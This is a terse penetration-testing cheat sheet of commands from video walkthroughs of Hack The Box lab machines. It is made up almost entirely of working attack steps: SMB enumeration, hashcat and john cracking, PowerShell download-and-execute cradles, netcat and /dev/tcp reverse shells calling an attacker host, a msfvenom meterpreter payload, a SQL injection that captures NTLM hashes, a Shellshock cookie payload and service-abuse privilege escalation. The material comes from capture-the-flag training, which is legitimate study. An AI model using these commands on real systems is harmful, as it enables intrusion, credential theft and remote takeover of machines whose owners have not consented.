>>> Choose a topic: https://ippsec.rocks/


[*] Windows Bastion - https://www.youtube.com/watch?v=2j3FNp5pjQ4&list=PLidcsTyj9JXL4Jv6u9qi8TcUgsNoKKHNn

	-> nmap -sC -sV -oA nmap/bastion 10.10.10.134
	-> smbclient -L //10.10.10.134
	-> mount -t cifs //10.10.10.134/Backups /mnt/test
	-> smbmap -u RandomUser -H 10.10.10.134


[*] Windows Blue - https://www.youtube.com/watch?v=YRsfX6DW10E&list=PLywtf_SEbeFFFIcA0T5Hwhtoj0AMRuqI5&index=2

	-> 



[*] Windows Arkham - https://www.youtube.com/watch?v=krC5j1Ab44I&list=PLidcsTyj9JXI9E9dT1jgXxvTOi7Pq_2c5

	-> smbmap -H 10.10.10.130 -u anonymous				(for -p put password between '')
	-> smbmap -H 10.10.10.130 -u anonymous -r --depth 5
	-> smbclient -U anonymous //10.10.10.130/batshare	(empty passwd)
	-> smbclient -N //10.10.10.130/batshare
	-> cryptsetup luksDump backup.img
	-> dd if=backup.img of=arkham-luks bs=512 count=4097
	-> ./hashcat -m 14600 arkham-luks /opt/wordlists/rockyou.txt

	-> powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.14.3/shell.ps1')
	-> powershell (New-Object Net.WebClient).downloadString('http://10.10.14.3/shell.ps1')
	-> powershell Invoke-WebRequest -Uri http://10.10.14.3/shell.ps1

	-> powershell IWR -uri http://10.10.14.3/nc.exe -OutFile C:\\windows\\temp\\nc.exe
	-> cmd /c c:\\windows\\temp\\nc.exe 10.10.14.3 9001 -e powershell.exe

	-> C:\> whoami /priv
	-> C:\> gci -recurse . | select fullname	(in powershell)
	-> C:\> certutil -encode \Users\Alfred\backup.zip c:\\windows\\temp\\backup.b64

	-> readpst alfred@arkham.local.ost

	-> C:\> $pass = ConvertTo-SecureString 'mypassword' -AsPlainText -Force
	-> C:\> $cred = New-Object System.Management.Automation.PSCredential("batman",$pass)
	-> C:\> Invoke-Command -Computer ARKHAM -ScriptBlock { whoami } -Credential $cred
	-> C:\> Invoke-Command -Computer ARKHAM -ScriptBlock { IWR -uri 10.10.14.3/nc.exe -outfile nc.exe } -credential $cred
	-> C:\> Invoke-Command -Computer ARKHAM -ScriptBlock { cmd /c nc.exe 10.10.14.3 9001 -e powershell.exe } -credential $cred

	-> C:\> net use Z: \\127.0.0.1\c$
	-> C:\> z:

	-> i686-w64-mingw32-g++ main.c -lws2_32 -o srrstr.dll -shared

	-> C:\> iwr -uri http://10.10.14.3/srrstr.dll -outfile srrstr.dll
	-> C:\> copy c:\users\batman\srrstr.dll c:\users\batman\appdata\local\microsoft\windowsapps\

	-> C:\> cmd /c c:\windows\microsoft.net\framework64\v4.0.30319\msbuild.exe payload.xml

	-> C:\> cmd /c c:\windows\SysWow64\SystemPropertiesAdvanced.exe


[*] Windows Querier - https://www.youtube.com/watch?v=d7ACjty4m7U&list=PLidcsTyj9JXI9E9dT1jgXxvTOi7Pq_2c5&index=2

	-> snmp-check 10.10.10.125
	-> smbmap -H 10.10.10.125
	-> smbclient -N -L //10.10.10.125/
	-> smbmap -H 10.10.10.125 -u anonymous
	-> smbmap -H 10.10.10.125 -u anonymous -d localhost
	-> smbclient -N //10.10.10.125/Reports

	-> cat allports.nmap | grep ^[0-9]| awk -F/ '{print $1}'| sort -u > ports
	-> for i in $(cat ports); do echo -n $i,; done

	-> olevba Report.xlsm

	-> locate mssqlclient.py
	-> mssqlclient.py reporting@10.10.10.125 -windows-auth

	-> responder -I tun0
	-> SQL> xp_dirtree "\\10.10.14.3\PleaseSub\"

	-> ./hashcat --example-hashes
	-> ./hashcat -m 5600 hashes/querier.ntlmv2 /opt/wordlist/rockyou.txt

	-> smbmap -u mssql-svc -p mypassword -d QUERIER -H 10.10.10.125
	-> mssqlclient.py mssql-svc@10.10.10.125 -windows-auth
	-> SQL> enable_xp_cmdshell
	-> SQL> xp_cmdshell powershell IEX(New-Object Net.WebClient).downloadstring(\"http://10.10.14.3/reverse.ps1\")
	-> rlwrap nc -lvnp 9001

	-> IEX(New-Object Net.WebClient).downloadstring('http://10.10.14.3/PowerUp.ps1')
	-> Invoke-AllChecks

	-> Invoke-ServiceAbuse -Name 'UsoSvc'
	-> Restart-Service UsoSvc
	-> net user

	-> psexec.py administrator@10.10.10.125 

	-> cmd.exe /c "dir /s /b | findstr Group"


[*] Windows Giddy - https://www.youtube.com/watch?v=J2unwbMQvUo&list=PLidcsTyj9JXI9E9dT1jgXxvTOi7Pq_2c5&index=3

	-> gobuster -w /usr/share/wordlist/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.104 -x asp,aspx -t 30
	-> tcpdump -i tun0 icmp
	-> responder -I tun0
	-> GET /mvc/Product.aspx?ProductSubCategory=27;declare @q varchar(200);set @q='\\10.10.10.14.3\PleaseSubscribe\test';exec master.dbo.xp_dirtee @q;--

	-> searchsploit -m exploits/windows/local/43390.txt
	-> msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.x.x LPORT=9001 -f exe -o met.exe
	-> impacket-smbserver file `pwd`
	-> msfdb run
	-> PS C:\programdata\Unifi-video> xcopy \\10.10.14.3\files\met.exe .

	-> PS C:\programdata\Unifi-video> xcopy \\10.10.14.3\files\revshell2.exe .
	-> PS C:\programdata\Unifi-video> move revshell2.exe taskkill.exe
	-> PS C:\programdata\Unifi-video> Set-Location 'HKLM:\SYSTEM\CurrentControlSet\Services'
	-> PS HKLM:\SYSTEM\CurrentControlSet\Services> get-childitem . | select name
	-> PS HKLM:\SYSTEM\CurrentControlSet\Services> get-childitem . | where-object { $_.Name -like '*UniFiVideoService*' }
	-> PS HKLM:\SYSTEM\CurrentControlSet\Services> Stop-Service "Ubiquiti UniFi Video"			(enter the DisplayName of the service)
	-> PS HKLM:\SYSTEM\CurrentControlSet\Services> Start-Service "Ubiquiti UniFi Video"

	-> PS C:\> (Get-PSReadLineOption).HistorySavePath				(Get powershell history)



[*] Windows SecNotes - https://www.youtube.com/watch?v=PJXb2pK8K84&list=PLidcsTyj9JXI9E9dT1jgXxvTOi7Pq_2c5&index=4

	-> wfuzz -c -w /usr/share/seclists/Usernames/Names/names.txt -d "username=FUZZ&password=PleaseSubscribe" --hs "No account found with that username." http://10.10.10.97/login.php
	-> smbmap -u tyler -p 'mypassword' -H 10.10.10.97
	-> smbclient -U 'tyler%mypassword' \\\\10.10.10.97\\new-site
	-> smb: \> put shell.php
	-> smb: \> put nc64.exe
	
	-> http://10.10.10.97:8808/shell.php?ippsec=nc64.exe 10.10.14.2 9001 -e powershell
	
	-> PS C:\> get-content user.txt | Measure-Object -Character

	-> psexec.py administrator@10.10.10.97

	-> grep -B5 -A5 -i 'sql' *.php


[*] Linux BrainFuck - https://www.youtube.com/watch?v=o5x1yg3JnYI&list=PLywtf_SEbeFG12GbEmASYkYIAIPMPxvFB

	-> wpscan -u https://brainfuck.htb --disable-tls-checks
	-> wpscan -u https://brainfuck.htb --disable-tls-checks --enumerate u

	-> WP Support Plus Responsive Ticket System 7.1.3 Privilege Escalation

	-> SMTP Mail Evolution set the server to brainfuck.htb
	
	-> ./sshng2john.py /root/id_rsa > /root/brainfuck-crack
	-> ./john /root/brainfuck-crack --wordlist=/opt/wordlist/rockyou.txt 					(crack the ssh key passphrase)


[*] Linux Shocker - https://www.youtube.com/watch?v=IBlTdguhgfY&list=PLywtf_SEbeFG12GbEmASYkYIAIPMPxvFB&index=2

	-> /opt/gobuster/gobuster -u http://10.10.10.56 -w /usr/share/wordlists/dirb/small.txt -s 302,307,200,204,301,403
	-> /opt/gobuster/gobuster -u http://10.10.10.56/cgi-bin/ -w /usr/share/wordlists/dirb/small.txt -s 302,307,200,204,301,403 -x sh,pl

	-> locate nse |grep shellshock
	-> nmap -sV -p80 --script http-shellshock --script-args uri=/cgi-bin/user.sh,cmd=ls 10.10.10.56
	-> debug nmap script: modify proxy in Burp

	-> Cookie: () { :;}; echo; /bin/bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

	-> Lin Enum scripts: /opt/linux_privesc/ 
	-> curl 10.10.10.56:8083/LinEnum.sh | bash

	-> /usr/bin/perl -e 'exec("/bin/bash")'


[*] Linux? Wall - https://www.youtube.com/watch?v=SyWUsN0yHKI

	-> wfuzz -u http://10.10.10.157/centreon/api/index.php?action=authenticate -d 'username=admin&password=FUZZ' -w /usr/share/seclists/Passwords/	darkweb2017-top1000.txt --hc 403

	-> echo "bash -c 'bash -i >& /dev/tcp/10.10.14.3/9001 0>&1'" | sed 's/ /${IFS}/g'

	-> background shell: CRTL+Z
	-> stty raw -echo
	-> nc -lvnp 9001
	-> (In the shell): export TERM=xterm
	-> (in the shell): stty rows 35
	-> (in the shell): stty columns 137

	-> grep -R -i '$_[GPR].*\[' .
	

[*] Windows Active - https://www.youtube.com/watch?v=jUc1J31DNdw&t=1560

	-> smbclient -L //10.10.10.100
	-> enum4linux 10.10.10.100
	-> smbmap -H 10.10.10.100

	-> smbmap -d active.htb -u svc_tgs -p mypassword -H 10.10.10.100 -R Users

	-> C:\> runas /netonly /user:TestUser cmd
	-> C:\> powershell
	-> C:\> Test-NetConnection -ComputerName 10.10.10.100 -Port 389
	-> C:\> .\SharpHound.exe -c all -d active.htb --domaincontroller 10.10.10.100

	-> GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/svc_tgs
	-> psexec.py active.htb/Administrator@10.10.10.100






	

















